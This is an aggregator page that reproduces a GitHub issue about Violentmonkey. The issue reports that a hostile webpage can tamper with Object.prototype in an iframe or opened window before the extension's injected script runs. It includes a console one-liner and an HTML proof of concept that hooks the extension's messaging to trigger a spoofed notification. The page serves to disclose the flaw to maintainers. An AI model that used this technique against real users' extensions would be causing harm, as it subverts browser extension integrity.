Stuck on an issue?
Lightrun Answers was designed to reduce the constant googling that comes with debugging 3rd party libraries. It collects links to all the places you might be looking at while hunting down a tough bug.
And, if you’re still stuck at the end, we’re happy to hop on a call to see how we can help out.
parent webpage can modify javascript objects inside `iframe.contentWindow` or `open()` before `injected-web.js` runs
See original GitHub issueparent webpage can modify javascript objects inside iframe.contentWindow or open() before injected-web.js runs
you just need violentmonkey installed and enabled in your browser
example: type open(location.href).Object.prototype.hasOwnProperty=console.log; in javascript console and press enter on any web page like https://example.org/ (file: urls don’t work in chromium)
demo html (host on http server):
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8"/>
<title>a spoopy 👻️</title>
</head>
<body>
<script type="text/javascript">
if(window===window.parent){
if(location.protocol==="file:")document.write("<h1>warning: \"file:\" urls don't work in chromium</h1>");
const fr=document.createElement("iframe");
fr.src=location.href;
document.body.appendChild(fr);
const op=fr.contentWindow.Object.prototype;
Object.defineProperty(op,"post",{
"configurable":true,
"set":function(value){
delete op.post;
this.post=value;
setTimeout(value,1000,"Notification",{
"id":0,
"text":"boo",
"title":"a spoopy 👻️",
"image":undefined
});
}
});
}else document.write("<h1>wait</h1>");
</script>
</body>
</html>
Issue Analytics
- State:
- Created 2 years ago
- Comments:36 (32 by maintainers)
Top Results From Across the Web
Invoking JavaScript code in an iframe from the parent page
Assume your iFrame's id is "targetFrame" and the function you want to call is targetFunction() : document.getElementById('targetFrame').
Read more >HTMLIFrameElement.contentWindow - Web APIs | MDN
The contentWindow property returns the Window object of an HTMLIFrameElement. You can use this Window object to access the iframe's document ...
Read more >Accessing an iframe document (contentWindow) - YouTube
In this video we take a look at the contentWindow and contentDocument properties of an embedded iframe - it allows access to the...
Read more >Cross-origin communication in between iframe and it's parent ...
Yes, it's not any hack or something, but with simple functions you can communicate in between iframe and it's parent website.
Read more >Best practices for React iframes - LogRocket Blog
Therefore, neither the parent component's CSS styling nor its JavaScript will have any effect on the iframe. In React, developers use ...
Read more >
Top Related Medium Post
No results found
Top Related StackOverflow Question
No results found
Troubleshoot Live Code
Lightrun enables developers to add logs, metrics and snapshots to live code - no restarts or redeploys required.
Start Free
Top Related Reddit Thread
No results found
Top Related Hackernoon Post
No results found
Top Related Tweet
No results found
Top Related Dev.to Post
No results found
Top Related Hashnode Post
No results found
No, it’s not a specific detection of Violentmonkey, just of any extension that inserts a DOM node.
I mean getting the notifications by having the webpage hook into violentmonkey. The demo here is patched yes, but the flaw itself where violentmonkey can be hooked isnt